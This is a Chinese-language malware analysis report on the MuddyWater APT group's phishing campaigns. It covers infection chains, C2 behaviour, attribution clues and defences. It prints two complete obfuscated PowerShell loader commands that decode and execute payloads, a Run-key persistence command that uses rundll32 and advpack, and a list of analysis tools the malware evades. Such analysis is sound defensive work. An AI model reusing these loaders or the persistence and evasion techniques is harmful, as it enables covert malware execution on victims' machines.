MuddyWater最新攻击活动分析
字数 1848 2025-08-19 12:40:43
MuddyWater APT组织攻击活动技术分析文档
一、组织概述
MuddyWater是一个自2017年出现的APT组织,主要攻击目标包括:
- 主要目标国家:伊朗、沙特阿拉伯
- 次要目标国家:约旦、土耳其、阿塞拜疆、巴基斯坦、阿富汗
- 其他受影响地区:马里、奥地利、俄罗斯、巴林等
攻击目标类型:
- 政府组织
- 军事实体
- 电信公司
- 教育机构
二、攻击技术细节
1. 初始感染向量
攻击方式:鱼叉式钓鱼攻击
- 使用启用宏的Office 97-2003文档
- 宏通常密码保护以防止静态分析
- 触发方式:
- 首次启用宏时执行
- 部分样本通过激活伪造文本框触发
2. 宏Payload分析
宏执行流程:
- Base64编码的payload执行以下操作:
- 释放2-3个文件到ProgramData文件夹
- 添加当前用户的RUN注册表项实现持久化
典型释放文件:
\EventManager.dll\EventManager.logs\WindowsDefenderService.inil
注册表持久化示例:
Name: WindowsDefenderUpdater
Type: REG_EXPAND_SZ
Data: c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1
3. 执行流分析
Case 1: INF/SCT/文本文件组合
- INF文件通过advpack.dll的LaunchINFSection函数启动
- INF通过scrobj.dll注册SCT文件
- SCT文件中的JS/VB代码通过WMI启用PowerShell one-liner
典型PowerShell命令:
powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\WindowsDefenderService.ini);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));
Case 2: VBS/文本文件组合
- VBS文件自解码后调用mshta.exe
- 传递VB脚本代码给PowerShell one-liner
典型PowerShell命令:
powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));
4. PowerShell代码功能
主要行为:
-
关闭Office安全设置:
- 禁用宏警告(Macro Warnings)
- 禁用受保护视图(Protected View)
-
反分析检测:
- 检查并匹配以下分析工具进程:
"win32_remote","win64_remote64","ollydbg","ProcessHacker","tcpview","autoruns","autorunsc","filemon","procmon","regmon","procexp","idaq","idaq64","ImmunityDebugger","Wireshark","dumpcap","HookExplorer","ImportREC","PETools","LordPE","dumpcap","SysInspector","proc_analyzer","sysAnalyzer","sniff_hit","windbg","joeboxcontrol","joeboxserver" - 检测到分析工具时触发重启或蓝屏(通过ntdll.dll NtRaiseHardError)
- 检查并匹配以下分析工具进程:
5. C2通信机制
-
C2服务器选择:
- 从硬编码URL列表中随机选择
- 失败后尝试其他URL并休眠1-30秒
-
受害者注册:
- 通过https://api.ipify.org/获取公网IP
- 加密发送以下信息:
- 公网IP
- OS版本
- 内网IP
- 机器名
- 域名
- 用户名
- 接收分配的$sysid用于后续通信
6. 支持的命令
| 命令 | 功能 |
|---|---|
| upload | 从C2下载文件保存到ProgramData |
| screenshot | 截屏保存为PNG文件 |
| Excel | 接收PS代码通过Excel DDE执行 |
| Outlook | 接收PS代码通过Outlook COM执行 |
| Risk | 接收PS代码通过Explorer.exe执行 |
| Reboot | 立即重启系统 |
| Shutdown | 立即关闭系统 |
| Clean | 破坏C/D/E/F盘后重启 |
三、攻击者特征分析
-
文档元数据线索:
C:\Users\leo\AppData\Local\Temp\Word8.0\MSForms.exdC:\Users\poopak\AppData\Local\Temp\Word8.0\MSForms.exdC:\Users\Vendetta\AppData\Local\Temp\Word8.0\MSForms.exdC:\Users\Turk\AppData\Local\Temp\Word8.0\MSForms.exd
-
语言特征:
- 样本中发现中文提示:
无法连接到网址,请等待龙...无法访问本地计算机寄存器任务计划程序访问被拒绝
- 样本中发现中文提示:
-
真实C2服务器(可能):
- http://www.cankayasrc[.]com/style/js/main.php
- http://ektamservis[.]com/includes/main.php
- http://gtme[.]ae/font-awesome/css/main.php
四、防御建议
-
针对初始感染:
- 禁用Office宏执行
- 启用受保护视图
- 教育用户识别钓鱼邮件
-
检测指标:
- 监控ProgramData目录异常文件创建
- 检测RUN注册表项异常修改
- 监控异常PowerShell命令执行
-
高级防御:
- 部署行为分析检测反分析行为
- 阻断已知C2域名/IP
- 监控对api.ipify.org的异常访问
-
应急响应:
- 发现感染后立即隔离系统
- 检查所有磁盘破坏情况
- 重置所有凭据